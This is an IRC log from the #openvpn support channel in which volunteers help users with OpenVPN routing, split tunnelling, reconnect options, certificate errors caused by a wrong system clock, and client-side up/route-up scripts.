15:56 -!- zeshoem [~zee@198-84-231-11.cpe.teksavvy.com] has quit []
16:04 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds]
16:13 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
16:15 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:16 < wykydtron> I am trying to setup split tunneling, I am not familiar with setting up the server side route. How would I set it up so the client can see the VPN server samba folders?
16:17 < wykydtron> I commented out push "redirect-gateway def1" in server.conf and clientside i added: route [serverip] 255.255.255.0 vpn_gateway
16:25 -!- dazo is now known as dazo_afk
16:33 < pekster> wykydtron: Are you trying to expose a LAN network behind the server, or just the virtual VPN subnet itself?
16:46 < rob0> "Samba folders" is a red herring. If the IP routing works, Samba can work with IP addresses. If WINS and nmbd(8) work, Samba can also work with names. #samba is down the hall if you're stuck on that.
16:48 -!- jthunder [~jthunder@70.28.245.121] has quit [Quit: jthunder]
16:55 < wykydtron> pekster just virtual vpn subnet. Samba is setup fine, just not sure how to properly setup split tunnel
16:56 < pekster> What do you need a split tunnel for if you already have routing working for a unique virtual VPN network? Sounds like you're all done
16:58 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Remote host closed the connection]
16:59 < rob0> If you can ping through the tunnel, openvpn is fine.
17:01 < wykydtron> Maybe I'm approaching this the wrong way.
17:02 < wykydtron> If I have full OpenVPN setup on the server with samba setup, the client can see the folders. However, I do not want the client routing all internet traffic to VPN. I only want the client to see the servers shared folders through the VPN.
17:07 < pekster> OpenVPN is a routing and encryption protocol, not a file-sharing protocol. That's like saying that you need to buy a green network cable or you can't connect to the PC on your co-worker's desk: they're unrelated things. You can use discovery protocols (WINS, DNS, DFS, etc) across a VPN just like you can send a ping across any color Ethernet cable
17:07 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds]
17:07 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.]
17:08 < rob0> If you don't want --redirect-gateway, why is it in your config?
17:08 < rob0> oh. "I commented out push "redirect-gateway def1" in server.conf ..."
17:09 < rob0> so what's wrong now?
17:09 < rob0> "split tunnel" means what?
17:10 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
17:11 < wykydtron> rob0: instead of using redirect-gateway parameter, i thought to use the route directive, specifying net_gateway or vpn_gateway perhaps I misunderstood how these work.
17:11 <@krzee> wykydtron, a vpn is like an ethernet cable, you dont have to do more than a point to point link, but you CAN choose to route a lan or the entire internet (or anything between) over it
17:11 <@krzee> do you need to access a lan over the vpn? or just something on the vpn server?
17:12 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn
17:13 < wykydtron> krzee: I would say lan, I'd like to have my workstation and laptop map a network drive.
17:13 <@krzee> 2 machines on the client side, but only the server itself on the server side?
17:13 < wykydtron> I have a script monitoring file changes to these specific files I want to access, before someone suggested simply Dropbox but that does not work for my specific application
17:14 < wykydtron> krzee yes sir
17:14 <@krzee> !sample
17:14 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting
17:14 <@krzee> !clientlan
17:14 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for
17:14 <@vpnHelper> a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
17:14 <@krzee> done.
17:15 <@krzee> you dont need to push any routes to the client
17:15 <@krzee> unless you want other clients to access this clients lan as well
17:16 <@krzee> bbl, back to work
17:16 < wykydtron> krzee: thank you. Nope, only want clients to the server :] I will look this over.
17:16 <@krzee> yw
17:20 -!- brute11k1 [~brute11k@89.249.231.124] has quit [Quit: Leaving.]
17:21 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
17:24 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 276 seconds]
17:30 -!- rocco1 [~rocco@2001:4dd0:fd53:101:1d09:eea4:2a2:3f7] has quit [Ping timeout: 245 seconds]
17:47 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Read error: Connection reset by peer]
17:56 -!- Changos [~Changos@unaffiliated/changos] has joined #openvpn
17:56 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
17:56 < Changos> Hello guys
17:57 < Changos> I have an OpenBSD server with OpenVPN, and I'd like to connect this with clients on Cisco Linksys RV042, is this possible ?
17:58 < Changos> the connection type is point to point
18:01 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
18:03 < pekster> Changos: OpenWRT and similar projects are able to run openvpn, as long as the hardware supports the requirements for the embedded distribution and has enough flash memory and RAM (8M flash and 32M RAM is a good minimum to shoot for. I've done openwrt+openvpn with less before, but it's not fun)
18:05 -!- b1rkh0ff [~b1rkh0ff@31.176.147.137] has quit [Read error: Connection reset by peer]
18:15 < Changos> pekster: cool, long time I hear about OpenWRT, but I don't know it OpenWRT. I need to get Firewall, web filter, load balancing, dhcp server, NAT, and VPN on same device
18:19 -!- rocco [~rocco@ip-109-90-212-13.unitymediagroup.de] has joined #openvpn
18:26 < sam1> wndr3800 is pretty neat with openwrt
18:27 -!- PryMar56 [~prymar@cpe-98-149-139-90.socal.res.rr.com] has quit [Ping timeout: 245 seconds]
18:33 -!- rocco [~rocco@ip-109-90-212-13.unitymediagroup.de] has left #openvpn []
18:42 < Azrael_-> if a vpn-connection fails (e.g. routing temporarily down), does openvpn try to reestablish the connection? how often is it tried? how long does it wait between the tries?
18:42 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn
18:49 < pekster> Azrael_-: See the --keepalive option and the related raw directives --ping, --ping-restart, and --ping-exit
18:50 <@krzee> !keepalive
18:50 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive
18:53 < pekster> Always taking the easy way :P
18:54 < Changos> I got it ! :D, I'll use mikrotik device, this can be used with OpenVPN :P
18:57 <@krzee> whoa, you're the second person this week to mention that device
19:00 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn
19:09 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
19:19 -!- u0m3 [~Radu@92.80.109.202] has quit [Quit: Leaving]
19:27 -!- Changos [~Changos@unaffiliated/changos] has quit [Remote host closed the connection]
19:30 -!- adolfomaltez [~taro@190.62.205.158] has joined #openvpn
19:31 -!- mufasa27 [~mufasa@unaffiliated/mufasa27] has joined #openvpn
19:32 < mufasa27> How can I tunnel openvpn to only work with individual terminal shells? As in: use a terminal shell through vpn while still keeping other applications (web browsing) confined to local network?
19:34 -!- u0m3 [~Radu@92.80.109.202] has joined #openvpn
19:34 < pekster> mufasa27: OpenVPN creates a tun or tap adapter. Unless you change your routing, that shouldn't have an impact on applications that don't use a route created when you establish a new connection
19:35 < mufasa27> pekster: hey! thanks for the help earlier this morning! got everything up and running. :)
19:36 < mufasa27> pekster: so I should already have the applications running through eth0 that need to be accessing eth0; before I create tun0? then anything after that will use tun0?
19:36 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
19:37 < pekster> mufasa27: It doesn't matter if you connect things before or after. Simply creating a new network won't "hijack" your other traffic, *unless* you've specifically told OpenVPN to route networks (or the whole Internet) through your VPN connection
19:37 -!- mode/#openvpn [+v pekster] by ChanServ
19:37 < mufasa27> pekster: How would I check if that is the case or not?
19:38 <+pekster> Look at your logs or your routing table?
19:38 < mufasa27> I don't have a routing table currently
19:38 <+pekster> OpenVPN is worthless on a system without networking. If you have networking support, you have a routing table
19:38 <+pekster> !101
19:38 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc
19:39 <+pekster> Maybe you want a more beginner's guide to how tcp/ip works?
19:39 <+pekster> !tcpip
19:39 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
19:40 < mufasa27> ok, thank you.
19:40 <+pekster> OpenVPN isn't really going to be useful if you don't have a pretty good handle on concepts like routes, gateways, and CIDR/netmask notation
19:40 < mufasa27> Using it to develop at work from home. Don't know hardly anything about networking. Sorry for offtopic questions
19:42 <+pekster> We focus on using and configuring openvpn, and less on 'how routing works' here. OpenVPN can pass hosts, networks (like your work network range) or even "all of the Internet" through the tunnel. I don't know how your setup is since I haven't seen it. You'd need to look at your logs and routing table to know
19:43 <+pekster> 'ip route show' will likely provide you clues how this is set up. Some basic guides online can guide you through understanding what that output means if that's an issue
19:43 < mufasa27> pekster: thank you. And thank you for the help earlier on setting up my vpn
19:44 <+pekster> Yea, I'm not sure if it's a systemic issue with poor systemd support, or perhaps more likely something not well with your setup. I don't see the benefit of using a series of userland tools for the task of entering a password :\
19:46 -!- adolfomaltez [~taro@190.62.205.158] has quit [Ping timeout: 272 seconds]
19:46 < mufasa27> pekster: haha yeah true. I had to downgrade to an older version of openvpn instead of version 2.3 I had to use 2.2.2 in order for it to work correctly with systemd. rc.d just worked before and now everything had to change.
19:47 -!- adolfomaltez [~taro@190.62.246.31] has joined #openvpn
19:52 -!- mete [~mete@84.200.83.33] has quit [Ping timeout: 248 seconds]
19:54 -!- mete [~mete@mete.shell.la] has joined #openvpn
20:07 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
20:07 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
20:07 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
20:07 -!- mode/#openvpn [+o krzee] by ChanServ
20:07 -!- mufasa27 [~mufasa@unaffiliated/mufasa27] has left #openvpn []
21:30 -!- mete [~mete@mete.shell.la] has quit [Ping timeout: 272 seconds]
21:31 -!- baobei [~baobei@180.155.14.35] has joined #openvpn
21:31 < baobei> hey
21:31 < baobei> getting strange error in log
21:31 < baobei> http://pastebin.ca/2308821
21:32 < baobei> basically get that over and over in a loop
21:32 -!- mete [~mete@mete.shell.la] has joined #openvpn
21:32 < baobei> it was working fine yesterday didnt touch anything
21:32 <+pekster> Line 4
21:32 <@krzee> ntpdate time.nist.gov
21:33 < rob0> I'd use CC.pool.ntp.org, FWIW
21:33 < rob0> (where CC is your country code)
21:33 <@krzee> i only know 2 by heart
21:33 <@krzee> ill try to remember that tho
21:34 < rob0> Fri Jun 08 :)
21:34 <+pekster> Just wait 7 months :P
21:35 < baobei> just can't see any reason why i'd get that error when i didn't change anything
21:35 < rob0> oh crap. My CA is expiring in a bit over a month.
21:35 <@krzee> doh!
21:35 < baobei> rob0, lol was it at the default 3500 days?
21:35 < rob0> I think I made it for 5 years.
21:36 < rob0> next one will be ten. Then I will be certain to forget everything I knew!
21:36 < baobei> probably openvpn wasn't even around 10 years ago
21:37 < rob0> Initial release 1.1.0 / April 10, 2002
21:37 < baobei> wow even back then
21:37 <@krzee> ovpn1 didnt use pki tho ;]
21:37 < rob0> I was using it back in '04, but not using servers until much later.
21:38 < baobei> back then i was like 6 or 7
21:42 < baobei> im thinkin it might be a bug
21:42 < baobei> my certs are all valid
21:49 < rob0> um, "Fri Jun 08" is the date in your logs. What timezone is UTC-7months? :)
21:50 < rob0> I'm thinking it's exactly as krzee and pekster pointed out: your system clock is wrong!
21:50 < baobei> takes 7 months for the light to reach earth from the planet i live
21:50 < rob0> ah, cool
21:51 < rob0> So 6 or 7 of your planet's years are what, 35-40 Earth years?
21:54 -!- baobei_ [~baobei@192.73.252.248] has joined #openvpn
21:54 -!- baobei [~baobei@180.155.14.35] has quit [Read error: Connection reset by peer]
21:54 < baobei_> yes
21:54 < baobei_> changing time fixed it
21:54 < baobei_> but weirdly windows aero stopped working and won't come back lol
21:57 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds]
21:59 -!- MeanderingCode_ [~Meanderin@71.213.164.111] has joined #openvpn
22:01 -!- baobei_ [~baobei@192.73.252.248] has quit [Ping timeout: 276 seconds]
22:02 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 252 seconds]
22:04 -!- colo-work [~jt@78.142.138.4] has quit [Ping timeout: 248 seconds]
22:05 -!- colo-work [~jt@78.142.138.4] has joined #openvpn
22:06 -!- colo-work [~jt@78.142.138.4] has quit [Excess Flood]
22:07 -!- cosmicgate [~root@108.166.200.61] has joined #openvpn
22:07 -!- colo-work [~jt@78.142.138.4] has joined #openvpn
22:31 -!- fling [~fling@fsf/member/fling] has left #openvpn []
23:32 < EugeneKay> That's windows.
23:40 -!- MeanderingCode_ [~Meanderin@71.213.164.111] has quit [Remote host closed the connection]
23:43 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
23:57 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer]
--- Day changed Wed Jan 30 2013
00:09 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 245 seconds]
00:10 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 245 seconds]
00:15 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
00:20 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 252 seconds]
00:35 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
00:43 -!- adolfomaltez [~taro@190.62.246.31] has quit [Ping timeout: 276 seconds]
00:43 -!- adolfomaltez [~taro@190.62.223.6] has joined #openvpn
00:49 -!- Devastator- is now known as Devastator
00:51 -!- adolfomaltez [~taro@190.62.223.6] has quit [Ping timeout: 272 seconds]
00:51 -!- adolfomaltez [~taro@190.62.253.3] has joined #openvpn
00:57 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn
01:08 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
01:30 -!- master_of_master [~master_of@p57B545F7.dip.t-dialin.net] has quit [Ping timeout: 244 seconds]
01:31 -!- master_of_master [~master_of@p57B54CF7.dip.t-dialin.net] has joined #openvpn
01:37 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds]
01:44 -!- u0m3_ [~Radu@92.80.97.231] has joined #openvpn
01:47 -!- u0m3 [~Radu@92.80.109.202] has quit [Ping timeout: 272 seconds]
01:51 -!- ade_b [~Ade@37.250.188.230.bredband.tre.se] has joined #openvpn
01:51 -!- ade_b [~Ade@37.250.188.230.bredband.tre.se] has quit [Changing host]
01:51 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
02:01 -!- voxadam [~voxadam@76.14.255.37] has joined #openvpn
02:02 < voxadam> I just started reading about OpenVPN and I was wondering why Blowfish is chosen as the default cipher over AES.
02:02 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
02:03 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn
02:06 < cosmicgate> because we love fish
02:09 < voxadam> Well, AES is Twofish so wouldn't that make AES a better choice?
02:09 -!- jherek [~jherek@154.51.136.41] has joined #openvpn
02:09 -!- csaba [~csaba@195.199.154.25] has quit [Quit: Távozom]
02:09 < jherek> Hi there... I have a problem running openvpngui, it crashes when I try to connect to my vpn service... It is strange, as yesterday it worked flawlessly...
02:10 -!- adolfomaltez [~taro@190.62.253.3] has quit [Remote host closed the connection]
02:10 -!- brute11k [~brute11k@89.249.235.65] has joined #openvpn
02:15 < ||arifaX> I have a server 2.0.9-4etch1 with a config where clients do not need a certificate (we use OTP and I am aware of the security problems). I have a client 2.1_rc20 i686-pc-mingw32 [SSL] [LZO2] [PKCS11], it does not work with our previous config (working with older client), any ideas or help?
02:15 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 264 seconds]
02:16 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn
02:19 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder]
02:20 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
02:24 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
02:25 -!- jherek [~jherek@154.51.136.41] has quit [Quit: leaving]
02:47 -!- cosmicgate-- [~root@113.210.101.118] has joined #openvpn
02:47 -!- cosmicgate-- [~root@113.210.101.118] has quit [Client Quit]
02:48 -!- cosmicgate [~root@108.166.200.61] has quit [Ping timeout: 240 seconds]
02:57 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
03:05 -!- brute11k1 [~brute11k@89.249.235.234] has joined #openvpn
03:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
03:07 -!- brute11k [~brute11k@89.249.235.65] has quit [Ping timeout: 248 seconds]
03:11 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
03:22 -!- brute11k1 [~brute11k@89.249.235.234] has quit [Ping timeout: 256 seconds]
03:23 -!- brute11k [~brute11k@89.249.230.56] has joined #openvpn
03:24 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:39 -!- voxadam [~voxadam@76.14.255.37] has quit []
03:55 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection]
04:02 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn
04:03 -!- dazo_afk is now known as dazo
04:10 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 252 seconds]
04:13 -!- zz_AsadH is now known as AsadH
04:14 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn
04:21 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn
04:21 -!- mode/#openvpn [+o plaisthos] by ChanServ
04:35 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat]
04:36 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
04:44 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
04:44 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Read error: Connection reset by peer]
04:50 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.]
04:50 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
04:59 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 255 seconds]
05:00 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
05:01 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Read error: Connection reset by peer]
05:14 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn
05:19 -!- bigmeow [~mirror@184.82.217.174] has quit [Read error: Connection reset by peer]
05:30 -!- brute11k1 [~brute11k@89.249.231.243] has joined #openvpn
05:32 -!- brute11k [~brute11k@89.249.230.56] has quit [Ping timeout: 276 seconds]
05:37 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
05:42 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
05:51 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
05:51 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Read error: Connection reset by peer]
05:55 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
06:11 -!- c3vin [~c3vin@70.62.198.163] has joined #openvpn
06:11 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds]
06:12 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
06:25 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.]
06:33 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn
06:33 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Client Quit]
06:33 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn
06:33 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Client Quit]
06:34 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn
06:56 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn
06:59 -!- u0m3 [~Radu@109.96.166.88] has joined #openvpn
07:00 -!- u0m3_ [~Radu@92.80.97.231] has quit [Ping timeout: 255 seconds]
07:02 < stephan48> hi i am currently using iroute (ccd file) and route (openvpn server config file), to make a subnet behind the client accessible, is it possible to add routes (route commands) for client subnets without restarting the openvpn server (as done in the main config) on the fly? i would rather not do that when a bunch of clients is connected
07:04 < SpookZA> ccd files are read upon client connect - so if you kill the client, they will re-connect after 120 seconds (default) and the new values in the ccd will be published to them ... as far as I know, routes in the main config need a restart - ymmv, I am just a user :)
07:11 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
07:16 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
07:18 -!- bauruine [~stefan@91.236.116.112] has quit [Remote host closed the connection]
07:24 -!- cpm [~Chip@pdpc/supporter/active/cpm] has quit [Quit: cpm]
07:33 < stephan48> SpookZA: yep that was my q, if there's a way around the restart
07:34 <@dazo> stephan48: add what's needed into the ccd ... and put the other routes in the normal config ... and then to avoid restarting openvpn (if only routing changes) ... set up the routes manually with 'route' or 'ip route'
07:34 < stephan48> ah ok
07:35 <@dazo> openvpn reads the --route statements and executes a 'route' or 'ip route' command for each of these config lines
07:35 < stephan48> thanks for the help!
07:35 < stephan48> good to know
07:38 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
07:56 -!- defswork [~andy@141.0.50.105] has joined #openvpn
08:20 -!- niervol [~krystian@193.106.244.150] has quit [Ping timeout: 272 seconds]
08:28 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
08:39 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in]
08:40 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has quit [Ping timeout: 248 seconds]
08:43 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has joined #openvpn
08:45 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
08:53 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
09:00 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
09:02 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds]
09:06 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder]
09:07 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds]
09:12 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
09:16 -!- u0m3 [~Radu@109.96.166.88] has quit [Read error: Operation timed out]
09:17 -!- u0m3 [~Radu@92.80.121.78] has joined #openvpn
09:17 -!- brute11k1 [~brute11k@89.249.231.243] has quit [Ping timeout: 245 seconds]
09:20 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
09:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds]
09:23 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
09:28 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has quit [Ping timeout: 264 seconds]
09:30 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has joined #openvpn
09:43 -!- brute11k [~brute11k@89.249.230.219] has joined #openvpn
10:04 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has quit [Ping timeout: 264 seconds]
10:04 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds]
10:06 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 264 seconds]
10:06 -!- mete [~mete@mete.shell.la] has quit [Ping timeout: 272 seconds]
10:09 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
10:09 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has joined #openvpn
10:09 -!- mete [~mete@mete.shell.la] has joined #openvpn
10:14 -!- brute11k [~brute11k@89.249.230.219] has quit [Ping timeout: 255 seconds]
10:19 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
10:22 -!- c3vin [~c3vin@70.62.198.163] has joined #openvpn
10:24 -!- AsadH is now known as zz_AsadH
10:29 -!- sauce_ is now known as sauce
10:29 -!- sauce [sauce@ool-ad02ad20.dyn.optonline.net] has quit [Changing host]
10:29 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn
10:31 -!- brute11k [~brute11k@89.249.230.219] has joined #openvpn
10:39 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
10:49 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Read error: Connection reset by peer]
10:49 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn
10:53 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
11:09 -!- zz_AsadH is now known as AsadH
11:10 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds]
11:12 -!- Orbi [~opera@anon-185-20.vpn.ipredator.se] has joined #openvpn
11:16 -!- Winston_Smith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
11:17 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 256 seconds]
11:18 -!- Winston_Smith is now known as WinstonSmith
11:18 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn
11:18 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host]
11:18 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
11:19 -!- Porkepix [~Porkepix@157.138.191.181] has joined #openvpn
11:19 -!- JoeyJoeJo [~brian@pool-173-72-191-174.clppva.fios.verizon.net] has joined #openvpn
11:19 -!- Porkepix [~Porkepix@157.138.191.181] has quit [Client Quit]
11:20 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
11:21 -!- bwallen [~brian@pool-173-72-191-174.clppva.fios.verizon.net] has joined #openvpn
11:22 < bwallen> I have two openvpn servers. One is just a backup in case the first one goes down and each client has both IP addresses in their config files. The clients are always connected. I want to know if for some reason a client failed to connect to the primary server on ping restart and connected to the secondary. Can I do that via an up script?
11:23 -!- JoeyJoeJo [~brian@pool-173-72-191-174.clppva.fios.verizon.net] has left #openvpn []
11:26 < dioz> what?
11:27 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat]
11:28 < bwallen> I want to be notified if a client connects to my backup openvpn server rather than the primary
11:28 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds]
11:28 < bwallen> I can write a script to do that, I just don't know if specifying my script as an "up" script in the client's config will execute it on ping-restart
11:29 < bwallen> I had an incident where my primary openvpn server was up, but on ping-restart a client timed out when trying to reconnect so it automatically connected to the secondary server
11:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
11:32 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 252 seconds]
11:32 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in]
11:33 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out]
11:35 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
11:37 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
11:37 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
11:37 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
11:37 -!- mode/#openvpn [+o krzee] by ChanServ
11:39 -!- toky [~toky@wsip-174-77-152-130.dc.dc.cox.net] has joined #openvpn
11:40 -!- Orbi [~opera@anon-185-20.vpn.ipredator.se] has left #openvpn []
11:42 -!- Orbi [~opera@anon-185-20.vpn.ipredator.se] has joined #openvpn
11:46 <@dazo> bwallen: there's no script-hook if the connection fails ... if that's what you ask about .... anyhow, --up might be too early for your .... you might need --route-up
11:47 <@dazo> (--up is run before a connection is attempted)
11:47 < bwallen> Ah, I didn't know about route-up. Thanks
11:48 * dazo just looked at the man page
11:48 <@dazo> seems you can use --up ... but you need to play with --up-delay and --up-restart too then probably
11:54 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn
11:59 -!- AsadH is now known as zz_AsadH
